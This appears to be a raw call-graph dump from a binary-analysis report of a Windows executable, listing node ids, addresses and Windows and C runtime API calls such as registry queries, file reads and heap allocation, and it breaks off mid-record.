7b27ec 26 API calls pre_c_initialization 95303->95364 95308 7b902d ReadFile 95305->95308 95307 7b8e6a 95310 7b29c8 _free 20 API calls 95307->95310 95311 7b90a1 GetLastError 95308->95311 95312 7b9047 95308->95312 95309->95305 95313 7b8fdd 95309->95313 95314 7b8e71 95310->95314 95315 7b90ae 95311->95315 95316 7b9005 95311->95316 95312->95311 95327 7b901e 95312->95327 95313->95308 95317 7b8fe3 ReadConsoleW 95313->95317 95318 7b8e7b 95314->95318 95319 7b8e96 95314->95319 95378 7af2d9 20 API calls __dosmaperr 95315->95378 95323 7b8e45 __fread_nolock 95316->95323 95375 7af2a3 20 API calls __dosmaperr 95316->95375 95322 7b8fff GetLastError 95317->95322 95317->95327 95372 7af2d9 20 API calls __dosmaperr 95318->95372 95374 7b9424 28 API calls __fread_nolock 95319->95374 95322->95316 95324 7b29c8 _free 20 API calls 95323->95324 95324->95285 95326 7b90b3 95379 7af2c6 20 API calls __dosmaperr 95326->95379 95327->95323 95333 7b906c 95327->95333 95334 7b9083 95327->95334 95349 7bf89b 95329->95349 95330 7b8e80 95373 7af2c6 20 API calls __dosmaperr 95330->95373 95376 7b8a61 31 API calls 2 library calls 95333->95376 95334->95323 95336 7b909a 95334->95336 95377 7b88a1 29 API calls __fread_nolock 95336->95377 95338 7b909f 95338->95323 95339->95245 95340->95261 95341->95255 95342->95254 95343->95264 95344->95265 95345->95261 95346->95246 95347->95254 95348->95261 95350 7bf8a8 95349->95350 95351 7bf8b5 95349->95351 95383 7af2d9 20 API calls __dosmaperr 95350->95383 95353 7bf8c1 95351->95353 95384 7af2d9 20 API calls __dosmaperr 95351->95384 95353->95302 95355 7bf8ad 95355->95302 95356 7bf8e2 95385 7b27ec 26 API calls pre_c_initialization 95356->95385 95358->95279 95359->95285 95360->95289 95361->95288 95362->95298 95363->95303 95364->95323 95365->95301 95367 7b29d3 RtlFreeHeap 95366->95367 95368 7b29fc __dosmaperr 95366->95368 95367->95368 95369 7b29e8 95367->95369 95368->95307 95386 7af2d9 20 API calls __dosmaperr 95369->95386 95371 7b29ee GetLastError 95371->95368 95372->95330 95373->95323 95374->95329 95375->95323 95376->95323 95377->95338 95378->95326 95379->95323 95380->95282 95381->95288 95382->95285 95383->95355 95384->95356 95385->95355 95386->95371 95387 7a03fb 95388 7a0407 ___BuildCatchObject 95387->95388 95416 79feb1 95388->95416 95390 7a0561 95443 7a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95390->95443 95392 7a040e 95392->95390 95394 7a0438 95392->95394 95393 7a0568 95444 7a4e52 28 API calls _abort 95393->95444 95405 7a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95394->95405 95427 7b247d 95394->95427 95396 7a056e 95445 7a4e04 28 API calls _abort 95396->95445 95399 7a0576 95401 7a0457 95403 7a04d8 95435 7a0959 95403->95435 95405->95403 95439 7a4e1a 38 API calls 3 library calls 95405->95439 95407 7a04de 95408 7a04f3 95407->95408 95440 7a0992 GetModuleHandleW 95408->95440 95410 7a04fa 95410->95393 95411 7a04fe 95410->95411 95412 7a0507 95411->95412 95441 7a4df5 28 API calls _abort 95411->95441 95442 7a0040 13 API calls 2 library calls 95412->95442 95415 7a050f 95415->95401 95417 79feba 95416->95417 95446 7a0698 IsProcessorFeaturePresent 95417->95446 95419 79fec6 95447 7a2c94 10 API calls 3 library calls 95419->95447 95421 79fecb 95426 79fecf 95421->95426 95448 7b2317 95421->95448 95424 79fee6 95424->95392 95426->95392 95430 7b2494 95427->95430 95428 7a0a8c CatchGuardHandler 5 API calls 95429 7a0451 95428->95429 95429->95401 95431 7b2421 95429->95431 95430->95428 95432 7b2450 95431->95432 95433 7a0a8c CatchGuardHandler 5 API calls 95432->95433 95434 7b2479 95433->95434 95434->95405 95516 7a2340 95435->95516 95437 7a096c GetStartupInfoW 95438 7a097f 95437->95438 95438->95407 95439->95403 95440->95410 95441->95412 95442->95415 95443->95393 95444->95396 95445->95399 95446->95419 95447->95421 95452 7bd1f6 95448->95452 95451 7a2cbd 8 API calls 3 library calls 95451->95426 95455 7bd213 95452->95455 95456 7bd20f 95452->95456 95454 79fed8 95454->95424 95454->95451 95455->95456 95458 7b4bfb 95455->95458 95470 7a0a8c 95456->95470 95459 7b4c07 ___BuildCatchObject 95458->95459 95477 7b2f5e EnterCriticalSection 95459->95477 95461 7b4c0e 95478 7b50af 95461->95478 95463 7b4c1d 95469 7b4c2c 95463->95469 95491 7b4a8f 29 API calls 95463->95491 95466 7b4c27 95492 7b4b45 GetStdHandle GetFileType 95466->95492 95468 7b4c3d __wsopen_s 95468->95455 95493 7b4c48 LeaveCriticalSection _abort 95469->95493 95471 7a0a97 IsProcessorFeaturePresent 95470->95471 95472 7a0a95 95470->95472 95474 7a0c5d 95471->95474 95472->95454 95515 7a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95474->95515 95476 7a0d40 95476->95454 95477->95461 95479 7b50bb ___BuildCatchObject 95478->95479 95480 7b50c8 95479->95480 95481 7b50df 95479->95481 95502 7af2d9 20 API calls __dosmaperr 95480->95502 95494 7b2f5e EnterCriticalSection 95481->95494 95484 7b50cd 95503 7b27ec 26 API calls pre_c_initialization 95484->95503 95485 7b50eb 95490 7b5117 95485->95490 95495 7b5000 95485->95495 95487 7b50d7 __wsopen_s 95487->95463 95504 7b513e LeaveCriticalSection _abort 95490->95504 95491->95466 95492->95469 95493->95468 95494->95485 95505 7b4c7d 95495->95505 95497 7b501f 95499 7b29c8 _free 20 API calls 95497->95499 95498 7b5012 95498->95497 95512 7b3405 11 API calls 2 library calls 95498->95512 95501 7b5071 95499->95501 95501->95485 95502->95484 95503->95487 95504->95487 95510 7b4c8a __dosmaperr 95505->95510 95506 7b4cca 95514 7af2d9 20 API calls __dosmaperr 95506->95514 95507 7b4cb5 RtlAllocateHeap 95508 7b4cc8 95507->95508 95507->95510 95508->95498 95510->95506 95510->95507 95513 7a4ead 7 API calls 2 library calls 95510->95513 95512->95498 95513->95510 95514->95508 95515->95476 95517 7a2357 95516->95517 95517->95437 95517->95517 95518 78105b 95523 78344d 95518->95523 95520 78106a 95554 7a00a3 29 API calls __onexit 95520->95554 95522 781074 95524 78345d __wsopen_s 95523->95524 95525 78a961 22 API calls 95524->95525 95526 783513 95525->95526 95555 783a5a 95526->95555 95528 78351c 95562 783357 95528->95562 95535 78a961 22 API calls 95536 78354d 95535->95536 95583 78a6c3 95536->95583 95539 7c3176 RegQueryValueExW 95540 7c320c RegCloseKey 95539->95540 95541 7c3193 95539->95541 95543 783578 95540->95543 95546 7c321e _wcslen 95540->95546 95542 79fe0b 22 API calls 95541->95542 95544 7c31ac 95542->95544 95543->95520 95589 785722 95544->95589 95546->95543 95551 784c6d 22 API calls 95546->95551 95553 78515f 22 API calls 95546->95553 95592 789cb3 95546->95592 95548 7c31d4 95550 786b57 22 API calls 95548->95550 95549 7c31ee ISource 95549->95540 95550->95549 95551->95546 95553->95546 95554->95522 95598 7c1f50 95555->95598 95558 789cb3 22 API calls 95559 783a8d 95558->95559 95600 783aa2 95559->95600 95561 783a97 95561->95528 95563 7c1f50 __wsopen_s 95562->95563 95564 783364 GetFullPathNameW 95563->95564 95565 783386 95564->95565 95566 786b57 22 API calls 95565->95566 95567 7833a4 95566->95567 95568 7833c6 95567->95568 95569 7833dd 95568->95569 95570 7c30bb 95568->95570 95610 7833ee 95569->95610 95572 79fddb 22 API calls 95570->95572 95574 7c30c5 _wcslen 95572->95574 95573 7833e8 95577 78515f 95573->95577 95575 79fe0b 22 API calls 95574->95575 95576 7c30fe __fread_nolock 95575->95576 95578 78516e 95577->95578 95582 78518f __fread_nolock 95577->95582 95581 79fe0b 22 API calls 95578->95581 95579 79fddb 22 API calls 95580 783544 95579->95580 95580->95535 95581->95582 95582->95579 95584 78a6dd 95583->95584 95585 783556 RegOpenKeyExW 95583->95585 95586 79fddb 22 API calls 95584->95586 95585->95539 95585->95543 95587 78a6e7 95586->95587 95588 79fe0b 22 API calls 95587->95588 95588->95585 95590 79fddb 22 API calls 95589->95590 95591 785734 RegQueryValueExW 95590->95591 95591->95548 95591->95549 95593 789cc2 _wcslen 95592->95593 95594 79fe0b 22 API calls 95593->95594 95595 789cea __fread_nolock 95594->95595 95596 79fddb 22 API calls 95595->95596 95597 789d00 95596->95597 95597->95546 95599 783a67 GetModuleFileNameW 95598->95599 95599->95558 95601 7c1f50 __wsopen_s 95600->95601 95602 783aaf GetFullPathNameW 95601->95602 95603 783ae9 95602->95603 95604 783ace 95602->95604 95605 78a6c3 22 API calls 95603->95605 95606 786b57 22 API calls 95604->95606 95607 783ada 95605->95607 95606->95607 95608 7837a0 22 API calls 95607->95608 95609 783ae6 95608->95609 95609->95561 95611 7833fe _wcslen 95610->95611 95612 7c311d 95611->95612 95613 783411 95611->95613 95615 79fddb 22 API calls 95612->95615 95620 78a587 95613->95620 95617 7c3127 95615->95617 95616 78341e __fread_nolock 95616->95573 95618 79fe0b 22 API calls 95617->95618 95619 7c3157 __fread_nolock 95618->95619 95621 78a59d 95620->95621 95624 78a598 __fread_nolock 95620->95624 95622 7cf80f 95621->95622 95623 79fe0b 22 API calls 95621->95623 95623->95624 95624->95616 95625 78dddc 95628 78b710 95625->95628 95629 78b72b 95628->95629 95630 7d00f8 95629->95630 95631 7d0146 95629->95631 95656 78b750 95629->95656 95634 7d0102 95630->95634 95637 7d010f 95630->95637 95630->95656 95694 8058a2 235 API calls 2 library calls 95631->95694 95692 805d33 235 API calls 95634->95692 95654 78ba20 95637->95654 95693 8061d0 235 API calls 2 library calls 95637->95693 95640 7d03d9 95640->95640 95644 78ba4e 95645 7d0322 95701 805c0c 82 API calls 95645->95701 95652 78bbe0 40 API calls 95652->95656 95653 79d336 40 API calls 95653->95656 95654->95644 95702 7f359c 82 API calls __wsopen_s 95654->95702 95656->95644 95656->95645 95656->95652 95656->95653 95656->95654 95659 78ec40 95656->95659 95683 78a81b 41 API calls 95656->95683 95684 79d2f0 40 API calls 95656->95684 95685 79a01b 235 API calls 95656->95685 95686 7a0242 5 API calls __Init_thread_wait 95656->95686 95687 79edcd 22 API calls 95656->95687 95688 7a00a3 29 API calls __onexit 95656->95688 95689 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95656->95689 95690 79ee53 82 API calls 95656->95690 95691 79e5ca 235 API calls 95656->95691 95695 78aceb 23 API calls ISource 95656->95695 95696 7df6bf 23 API calls 95656->95696 95697 78a8c7 95656->95697 95678 78ec76 ISource 95659->95678 95660 7a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95660->95678 95661 79fddb 22 API calls 95661->95678 95663 78fef7 95670 78a8c7 22 API calls 95663->95670 95675 78ed9d ISource 95663->95675 95665 7d4b0b 95706 7f359c 82 API calls __wsopen_s 95665->95706 95666 78a8c7 22 API calls 95666->95678 95667 7d4600 95671 78a8c7 22 API calls 95667->95671 95667->95675 95670->95675 95671->95675 95673 78fbe3 95673->95675 95677 7d4bdc 95673->95677 95682 78f3ae ISource 95673->95682 95674 78a961 22 API calls 95674->95678 95675->95656 95676 7a00a3 29 API calls pre_c_initialization 95676->95678 95707 7f359c 82 API calls __wsopen_s 95677->95707 95678->95660 95678->95661 95678->95663 95678->95665 95678->95666 95678->95667 95678->95673 95678->95674 95678->95675 95678->95676 95680 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95678->95680 95681 7d4beb 95678->95681 95678->95682 95703 7901e0 235 API calls 2 library calls 95678->95703 95704 7906a0 41 API calls ISource 95678->95704 95680->95678 95708 7f359c 82 API calls __wsopen_s 95681->95708 95682->95675 95705 7f359c 82 API calls __wsopen_s 95682->95705 95683->95656 95684->95656 95685->95656 95686->95656 95687->95656 95688->95656 95689->95656 95690->95656 95691->95656 95692->95637 95693->95654 95694->95656 95695->95656 95696->95656 95698 78a8ea __fread_nolock 95697->95698 95699 78a8db 95697->95699 95698->95656 95699->95698 95700 79fe0b 22 API calls 95699->95700 95700->95698 95701->95654 95702->95640 95703->95678 95704->95678 95705->95675 95706->95675 95707->95681 95708->95675 95709 78f7bf 95710 78f7d3 95709->95710 95711 78fcb6 95709->95711 95713 78fcc2 95710->95713 95714 79fddb 22 API calls 95710->95714 95803 78aceb 23 API calls ISource 95711->95803 95804 78aceb 23 API calls ISource 95713->95804 95716 78f7e5 95714->95716 95716->95713 95717 78f83e 95716->95717 95718 78fd3d 95716->95718 95732 78ed9d ISource 95717->95732 95744 791310 95717->95744 95805 7f1155 22 API calls 95718->95805 95721 7d4beb 95809 7f359c 82 API calls __wsopen_s 95721->95809 95723 78fef7 95731 78a8c7 22 API calls 95723->95731 95723->95732 95724 79fddb 22 API calls 95738 78ec76 ISource 95724->95738 95726 7d4b0b 95807 7f359c 82 API calls __wsopen_s 95726->95807 95727 78a8c7 22 API calls 95727->95738 95728 7d4600 95728->95732 95733 78a8c7 22 API calls 95728->95733 95731->95732 95733->95732 95735 7a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95735->95738 95736 78fbe3 95736->95732 95740 7d4bdc 95736->95740 95743 78f3ae ISource 95736->95743 95737 78a961 22 API calls 95737->95738 95738->95721 95738->95723 95738->95724 95738->95726 95738->95727 95738->95728 95738->95732 95738->95735 95738->95736 95738->95737 95739 7a00a3 29 API calls pre_c_initialization 95738->95739 95742 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95738->95742 95738->95743 95801 7901e0 235 API calls 2 library calls 95738->95801 95802 7906a0 41 API calls ISource 95738->95802 95739->95738 95808 7f359c 82 API calls __wsopen_s 95740->95808 95742->95738 95743->95732 95806 7f359c 82 API calls __wsopen_s 95743->95806 95745 7917b0 95744->95745 95746 791376 95744->95746 95925 7a0242 5 API calls __Init_thread_wait 95745->95925 95747 791390 95746->95747 95748 7d6331 95746->95748 95810 791940 95747->95810 95930 80709c 235 API calls 95748->95930 95752 7917ba 95755 7917fb 95752->95755 95757 789cb3 22 API calls 95752->95757 95754 7d633d 95754->95738 95759 7d6346 95755->95759 95761 79182c 95755->95761 95756 791940 9 API calls 95758 7913b6 95756->95758 95765 7917d4 95757->95765 95758->95755 95760 7913ec 95758->95760 95931 7f359c 82 API calls __wsopen_s 95759->95931 95760->95759 95784 791408 __fread_nolock 95760->95784 95927 78aceb 23 API calls ISource 95761->95927 95764 791839 95928 79d217 235 API calls 95764->95928 95926 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95765->95926 95768 7d636e 95932 7f359c 82 API calls __wsopen_s 95768->95932 95770 79152f 95771 79153c 95770->95771 95772 7d63d1 95770->95772 95773 791940 9 API calls 95771->95773 95934 805745 54 API calls _wcslen 95772->95934 95775 791549 95773->95775 95779 7d64fa 95775->95779 95781 791940 9 API calls 95775->95781 95776 79fddb 22 API calls 95776->95784 95777 791872 95929 79faeb 23 API calls 95777->95929 95778 79fe0b 22 API calls 95778->95784 95788 7d6369 95779->95788 95935 7f359c 82 API calls __wsopen_s 95779->95935 95786 791563 95781->95786 95783 78ec40 235 API calls 95783->95784 95784->95764 95784->95768 95784->95770 95784->95776 95784->95778 95784->95783 95785 7d63b2 95784->95785 95784->95788 95933 7f359c 82 API calls __wsopen_s 95785->95933 95786->95779 95789 78a8c7 22 API calls 95786->95789 95791 7915c7 ISource 95786->95791 95788->95738 95789->95791 95790 791940 9 API calls 95790->95791 95791->95777 95791->95779 95791->95788 95791->95790 95793 79167b ISource 95791->95793 95820 80958b 95791->95820 95823 7ed4ce 95791->95823 95826 7ff0ec 95791->95826 95835 784f39 95791->95835 95841 7f6ef1 95791->95841 95921 80959f 95791->95921 95792 79171d 95792->95738 95793->95792 95924 79ce17 22 API calls ISource 95793->95924 95801->95738 95802->95738 95803->95713 95804->95718 95805->95732 95806->95732 95807->95732 95808->95721 95809->95732 95811 791981 95810->95811 95819 79195d 95810->95819 95936 7a0242 5 API calls __Init_thread_wait 95811->95936 95812 7913a0 95812->95756 95814 79198b 95814->95819 95937 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95814->95937 95816 798727 95816->95812 95939 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95816->95939 95819->95812 95938 7a0242 5 API calls __Init_thread_wait 95819->95938 95940 807f59 95820->95940 95822 80959b 95822->95791 96104 7edbbe lstrlenW 95823->96104 95827 787510 53 API calls 95826->95827 95828 7ff126 95827->95828 96109 789e90 95828->96109 95830 7ff136 95831 7ff15b 95830->95831 95832 78ec40 235 API calls 95830->95832 95834 7ff15f 95831->95834 96137 789c6e 22 API calls 95831->96137 95832->95831 95834->95791 95836 784f4a 95835->95836 95837 784f43 95835->95837 95839 784f59 95836->95839 95840 784f6a FreeLibrary 95836->95840 96158 7ae678 95837->96158 95839->95791 95840->95839 95842 78a961 22 API calls 95841->95842 95843 7f6f1d 95842->95843 95844 78a961 22 API calls 95843->95844 95845 7f6f26 95844->95845 95846 7f6f3a 95845->95846 96572 78b567 39 API calls 95845->96572 95848 787510 53 API calls 95846->95848 95849 7f6f57 _wcslen 95848->95849 95850 7f70bf 95849->95850 95851 7f6fbc 95849->95851 95859 7f70e9 95849->95859 96387 784ecb 95850->96387 95852 787510 53 API calls 95851->95852 95854 7f6fc8 95852->95854 95857 78a8c7 22 API calls 95854->95857 95861 7f6fdb 95854->95861 95856 78a961 22 API calls 95860 7f711a 95856->95860 95857->95861 95858 784ecb 94 API calls 95862 7f70e5 95858->95862 95859->95791 95863 78a961 22 API calls 95860->95863 95864 7f7027 95861->95864 95867 7f7005 95861->95867 95870 78a8c7 22 API calls 95861->95870 95862->95856 95862->95859 95866 7f7126 95863->95866 95865 787510 53 API calls 95864->95865 95868 7f7034 95865->95868 95869 78a961 22 API calls 95866->95869 95871 7833c6 22 API calls 95867->95871 95872 7f703d 95868->95872 95873 7f7047 95868->95873 95874 7f712f 95869->95874 95870->95867 95875 7f700f 95871->95875 95876 78a8c7 22 API calls 95872->95876 96573 7ee199 GetFileAttributesW 95873->96573 95878 78a961 22 API calls 95874->95878 95879 787510 53 API calls 95875->95879 95876->95873 95881 7f7138 95878->95881 95882 7f701b 95879->95882 95880 7f7050 95883 7f7063 95880->95883 95887 784c6d 22 API calls 95880->95887 95884 787510 53 API calls 95881->95884 95885 786350 22 API calls 95882->95885 95886 787510 53 API calls 95883->95886 95893 7f7069 95883->95893 95888 7f7145 95884->95888 95885->95864 95889 7f70a0 95886->95889 95887->95883 96409 78525f 95888->96409 96574 7ed076 57 API calls 95889->96574 95892 7f7166 96451 784c6d 95892->96451 95893->95859 95896 7f71a9 95898 78a8c7 22 API calls 95896->95898 95897 784c6d 22 API calls 95899 7f7186 95897->95899 95900 7f71ba 95898->95900 95899->95896 95902 786b57 22 API calls 95899->95902 96454 786350 95900->96454 95904 7f719b 95902->95904 95906 786b57 22 API calls 95904->95906 95905 786350 22 API calls 95907 7f71d6 95905->95907 95906->95896 95908 786350 22 API calls 95907->95908 95909 7f71e4 95908->95909 95910 787510 53 API calls 95909->95910 95911 7f71f0 95910->95911 96463 7ed7bc 95911->96463 95913 7f7201 95914 7ed4ce 4 API calls 95913->95914 95915 7f720b 95914->95915 95916 787510 53 API calls 95915->95916 95920 7f7239 95915->95920 95917 7f7229 95916->95917 96517 7f2947 95917->96517 95919 784f39 68 API calls 95919->95859 95920->95919 95922 807f59 120 API calls 95921->95922 95923 8095af 95922->95923 95923->95791 95924->95793 95925->95752 95926->95755 95927->95764 95928->95777 95929->95777 95930->95754 95931->95788 95932->95788 95933->95788 95934->95786 95935->95788 95936->95814 95937->95819 95938->95816 95939->95812 95978 787510 95940->95978 95944 808281 95945 80844f 95944->95945 95949 80828f 95944->95949 96060 808ee4 60 API calls 95945->96060 95948 80845e 95948->95949 95950 80846a 95948->95950 96014 807e86 95949->96014 95966 807fd5 ISource 95950->95966 95951 787510 53 API calls 95968 808049 95951->95968 95956 8082c8 96029 79fc70 95956->96029 95959 808302 96033 7863eb 95959->96033 95960 8082e8 96057 7f359c 82 API calls __wsopen_s 95960->96057 95963 8082f3 GetCurrentProcess TerminateProcess 95963->95959 95966->95822 95968->95944 95968->95951 95968->95966 96055 7e417d 22 API calls __fread_nolock 95968->96055 96056 80851d 42 API calls _strftime 95968->96056 95970 8084c5 95970->95966 95972 8084d9 FreeLibrary 95970->95972 95971 808341 96058 808b7b 75 API calls 95971->96058 95972->95966 95974 7904f0 22 API calls 95977 808352 95974->95977 95977->95970 95977->95974 96059 78aceb 23 API calls ISource 95977->96059 96061 808b7b 75 API calls 95977->96061 95979 787525 95978->95979 95995 787522 95978->95995 95980 78755b 95979->95980 95981 78752d 95979->95981 95983 7c50f6 95980->95983 95986 7c500f 95980->95986 95987 78756d 95980->95987 96062 7a51c6 26 API calls 95981->96062 96065 7a5183 26 API calls 95983->96065 95984 78753d 95991 79fddb 22 API calls 95984->95991 95994 79fe0b 22 API calls 95986->95994 96000 7c5088 95986->96000 96063 79fb21 51 API calls 95987->96063 95989 7c510e 95989->95989 95992 787547 95991->95992 95993 789cb3 22 API calls 95992->95993 95993->95995 95997 7c5058 95994->95997 95995->95966 96001 808cd3 95995->96001 95996 79fddb 22 API calls 95998 7c507f 95996->95998 95997->95996 95999 789cb3 22 API calls 95998->95999 95999->96000 96064 79fb21 51 API calls 96000->96064 96002 78aec9 22 API calls 96001->96002 96003 808cee CharLowerBuffW 96002->96003 96066 7e8e54 96003->96066 96007 78a961 22 API calls 96008 808d2a 96007->96008 96073 786d25 96008->96073 96010 808d3e 96011 7893b2 22 API calls 96010->96011 96013 808d48 _wcslen 96011->96013 96012 808e5e _wcslen 96012->95968 96013->96012 96086 80851d 42 API calls _strftime 96013->96086 96015 807ea1 96014->96015 96019 807eec 96014->96019 96016 79fe0b 22 API calls 96015->96016 96017 807ec3 96016->96017 96018 79fddb 22 API calls 96017->96018 96017->96019 96018->96017 96020 809096 96019->96020 96021 8092ab ISource 96020->96021 96028 8090ba _strcat _wcslen 96020->96028 96021->95956 96022 78b38f 39 API calls 96022->96028 96023 78b567 39 API calls 96023->96028 96024 78b6b5 39 API calls 96024->96028 96025 787510 53 API calls 96025->96028 96026 7aea0c 21 API calls ___std_exception_copy 96026->96028 96028->96021 96028->96022 96028->96023 96028->96024 96028->96025 96028->96026 96090 7eefae 24 API calls _wcslen 96028->96090 96031 79fc85 96029->96031 96030 79fd1d VirtualAlloc 96032 79fceb 96030->96032 96031->96030 96031->96032 96032->95959 96032->95960 96034 7863f3 96033->96034 96035 79fddb 22 API calls 96034->96035 96036 786401 96035->96036 96091 786a26 96036->96091 96039 786a50 96094 78b010 96039->96094 96041 786a60 96042 79fe0b 22 API calls 96041->96042 96043 786afc 96041->96043 96042->96043 96043->95977 96044 7904f0 96043->96044 96045 790502 96044->96045 96048 79050b 96045->96048 96103 79a732 22 API calls 96045->96103 96047 7905c0 96047->95971 96048->96047 96049 79fddb 22 API calls 96048->96049 96050 790629 96049->96050 96051 79fddb 22 API calls 96050->96051 96052 790632 96051->96052 96053 789cb3 22 API calls 96052->96053 96054 790641 96053->96054 96054->95971 96055->95968 96056->95968 96057->95963 96058->95977 96059->95977 96060->95948 96061->95977 96062->95984 96063->95984 96064->95983 96065->95989 96068 7e8e74 _wcslen 96066->96068 96067 7e8f63 96067->96007 96067->96013 96068->96067 96069 7e8f68 96068->96069 96070 7e8ea9 96068->96070 96069->96067 96088 79ce60 41 API calls 96069->96088 96070->96067 96087 79ce60 41 API calls 96070->96087 96074 786d91 96073->96074 96075 786d34 96073->96075 96076 7893b2 22 API calls 96074->96076 96075->96074 96077 786d3f 96075->96077 96082 786d62 __fread_nolock 96076->96082 96078 7c4c9d 96077->96078 96079 786d5a 96077->96079 96081 79fddb 22 API calls 96078->96081 96089 786f34 22 API calls 96079->96089 96083 7c4ca7 96081->96083 96082->96010 96084 79fe0b 22 API calls 96083->96084 96085 7c4cda 96084->96085 96086->96012 96087->96070 96088->96069 96089->96082 96090->96028 96092 79fddb 22 API calls 96091->96092 96093 786409 96092->96093 96093->96039 96095 78b01b 96094->96095 96096 7cfb4d 96095->96096 96101 78b023 ISource 96095->96101 96097 79fddb 22 API calls 96096->96097 96099 7cfb59 96097->96099 96098 78b02a 96098->96041 96101->96098 96102 78b090 22 API calls ISource 96101->96102 96102->96101 96103->96048 96105 7edbdc GetFileAttributesW 96104->96105 96106 7ed4d5 96104->96106 96105->96106 96107 7edbe8 FindFirstFileW 96105->96107 96106->95791 96107->96106 96108 7edbf9 FindClose 96107->96108 96108->96106 96138 786270 96109->96138 96111 789fd2 96144 78a4a1 96111->96144 96113 789fec 96113->95830 96116 78a6c3 22 API calls 96136 789eb5 96116->96136 96117 7cf7c4 96156 7e96e2 84 API calls __wsopen_s 96117->96156 96118 7cf699 96125 79fddb 22 API calls 96118->96125 96119 78a405 96119->96113 96157 7e96e2 84 API calls __wsopen_s 96119->96157 96122 78a4a1 22 API calls 96122->96136 96124 7cf7d2 96126 78a4a1 22 API calls 96124->96126 96127 7cf754 96125->96127 96128 7cf7e8 96126->96128 96129 79fe0b 22 API calls 96127->96129 96128->96113 96130 78a12c __fread_nolock 96129->96130 96130->96117 96130->96119 96132 78a587 22 API calls 96132->96136 96133 78aec9 22 API calls 96134 78a0db CharUpperBuffW 96133->96134 96152 78a673 22 API calls 96134->96152 96136->96111 96136->96116 96136->96117 96136->96118 96136->96119 96136->96122 96136->96130 96136->96132 96136->96133 96143 784573 41 API calls _wcslen 96136->96143 96153 7848c8 23 API calls 96136->96153 96154 7849bd 22 API calls __fread_nolock 96136->96154 96155 78a673 22 API calls 96136->96155 96137->95834 96139 79fe0b 22 API calls 96138->96139 96140 786295 96139->96140 96141 79fddb 22 API calls 96140->96141 96142 7862a3 96141->96142 96142->96136 96143->96136 96145 78a52b 96144->96145 96150 78a4b1 __fread_nolock 96144->96150 96148 79fe0b 22 API calls 96145->96148 96146 79fddb 22 API calls 96147 78a4b8 96146->96147 96149 79fddb 22 API calls 96147->96149 96151 78a4d6 96147->96151 96148->96150 96149->96151 96150->96146 96151->96113 96152->96136 96153->96136 96154->96136 96155->96136 96156->96124 96157->96113 96159 7ae684 ___BuildCatchObject 96158->96159 96160 7ae6aa 96159->96160 96161 7ae695 96159->96161 96170 7ae6a5 __wsopen_s 96160->96170 96171 7a918d EnterCriticalSection 96160->96171 96188 7af2d9 20 API calls __dosmaperr 96161->96188 96164 7ae69a 96189 7b27ec 26 API calls pre_c_initialization 96164->96189 96165 7ae6c6 96172 7ae602 96165->96172 96168 7ae6d1 96190 7ae6ee LeaveCriticalSection __fread_nolock 96168->96190 96170->95836 96171->96165 96173 7ae60f 96172->96173 96174 7ae624 96172->96174 96216 7af2d9 20 API calls __dosmaperr 96173->96216 96181 7ae61f 96174->96181 96191 7adc0b 96174->96191 96176 7ae614 96217 7b27ec 26 API calls pre_c_initialization 96176->96217 96181->96168 96183 7ad955 __fread_nolock 26 API calls 96184 7ae646 96183->96184 96201 7b862f 96184->96201 96187 7b29c8 _free 20 API calls 96187->96181 96188->96164 96189->96170 96190->96170 96192 7adc23 96191->96192 96193 7adc1f 96191->96193 96192->96193 96194 7ad955 __fread_nolock 26 API calls 96192->96194 96197 7b4d7a 96193->96197 96195 7adc43 96194->96195 96218 7b59be 96195->96218 96198 7b4d90 96197->96198 96199 7ae640 96197->96199 96198->96199 96200 7b29c8 _free 20 API calls 96198->96200 96199->96183 96200->96199 96202 7b863e 96201->96202 96203 7b8653 96201->96203 96333 7af2c6 20 API calls __dosmaperr 96202->96333 96205 7b868e 96203->96205 96210 7b867a 96203->96210 96335 7af2c6 20 API calls __dosmaperr 96205->96335 96207 7b8643 96334 7af2d9 20 API calls __dosmaperr 96207->96334 96208 7b8693 96336 7af2d9 20 API calls __dosmaperr 96208->96336 96330 7b8607 96210->96330 96213 7b869b 96337 7b27ec 26 API calls pre_c_initialization 96213->96337 96214 7ae64c 96214->96181 96214->96187 96216->96176 96217->96181 96219 7b59ca ___BuildCatchObject 96218->96219 96220 7b59ea 96219->96220 96221 7b59d2 96219->96221 96223 7b5a88 96220->96223 96228 7b5a1f 96220->96228 96297 7af2c6 20 API calls __dosmaperr 96221->96297 96302 7af2c6 20 API calls __dosmaperr 96223->96302 96224 7b59d7 96298 7af2d9 20 API calls __dosmaperr 96224->96298 96227 7b5a8d 96303 7af2d9 20 API calls __dosmaperr 96227->96303 96243 7b5147 EnterCriticalSection 96228->96243 96229 7b59df __wsopen_s 96229->96193 96232 7b5a95 96304 7b27ec 26 API calls pre_c_initialization 96232->96304 96233 7b5a25 96235 7b5a41 96233->96235 96236 7b5a56 96233->96236 96299 7af2d9 20 API calls __dosmaperr 96235->96299 96244 7b5aa9 96236->96244 96239 7b5a46 96300 7af2c6 20 API calls __dosmaperr 96239->96300 96242 7b5a51 96301 7b5a80 LeaveCriticalSection __wsopen_s 96242->96301 96243->96233 96245 7b5ad7 96244->96245 96284 7b5ad0 96244->96284 96246 7b5adb 96245->96246 96247 7b5afa 96245->96247 96312 7af2c6 20 API calls __dosmaperr 96246->96312 96250 7b5b4b 96247->96250 96251 7b5b2e 96247->96251 96248 7a0a8c CatchGuardHandler 5 API calls 96252 7b5cb1 96248->96252 96255 7b5b61 96250->96255 96318 7b9424 28 API calls __fread_nolock 96250->96318 96315 7af2c6 20 API calls __dosmaperr 96251->96315 96252->96242 96253 7b5ae0 96313 7af2d9 20 API calls __dosmaperr 96253->96313 96305 7b564e 96255->96305 96257 7b5b33 96316 7af2d9 20 API calls __dosmaperr 96257->96316 96259 